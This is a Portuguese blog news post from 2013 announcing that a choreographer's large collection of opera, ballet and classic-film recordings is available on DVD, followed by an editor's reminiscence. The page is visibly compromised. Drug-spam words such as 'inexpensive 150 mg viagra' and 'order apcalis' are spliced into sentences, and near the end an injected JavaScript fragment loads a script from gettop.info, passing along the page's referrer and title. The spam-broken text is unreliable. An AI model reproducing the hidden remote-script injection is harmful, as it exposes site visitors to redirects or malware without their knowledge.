Escrito por em 29 nov 2013 nas áreas Notícia

O acervo de uma vida ao alcance de todos.

Ao longo de aproximadamente 40 anos, o diretor cênico e coreógrafo Fábio de Mello vem colecionando um vastíssimo acervo audiovisual, focado principalmente nas artes eruditas e clássicas. 

Tendo sua coleção uma média de 8 mil títulos, todo o material foi convertido para o formato de dvd – material este advindo das mais diversas fontes, desde as tradicionais fitas de vhs e betamax, discos Purchase de video laser, transmissões televisivas mundiais e até mesmo filmes em 16 e 8 milimetros. 

Obviamente a qualidade de imagem e áudio dentro de tamanho order apcalis acervo apresenta uma grande diversidade de resolução. Todos os esforços foram feitos, porém, ao longo desses anos para se chegar ao melhor grau de qualidade possível para cada uma dessas raridades.

Hoje, a coleção inexpensive 150 mg viagra passa a estar disponível para todos os amantes das artes, através desse site que oferece cópias de todos os seus títulos a preços mínimos e acessíveis a todos.

O que oferecemos

Você vai encontrar as mais incríveis raridades do mundo das artes cênicas, em formato Pills de DVD, sempre adquirindo, como dito acima, a melhor qualidade possível e imagem e som.

Óperas, balés, musicais, filmes clássicos, documentários e toda sorte de delivery evecare material cultural que você desejar.

Aquilo que você nunca imaginou Purchase ver ou rever, o Doctor encontra para você.

Consulte o Doctor Art

 

Acesse o site: http://dmell5.wix.com/doctor-art

 

 

Nota do editor

Sou testemunha de cheap flexisyn algumas raridades deste acervo, pois, durante alguns anos, frequentei a casa do Fábio, aos domingos, para assistir justamente a espetáculos raros. Nunca vou esquecer um “Lago dos Cisnes” só com bailarinos homens. Coisa lindíssima e que deve ser vista por todas as pessoas que gostam mesmo de arte. Fora isso, quantas óperas, musicais, etc… pudemos curtir naqueles momentos maravilhosos.

Antônio Rodrigues

 

 

}s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Faça seu comentário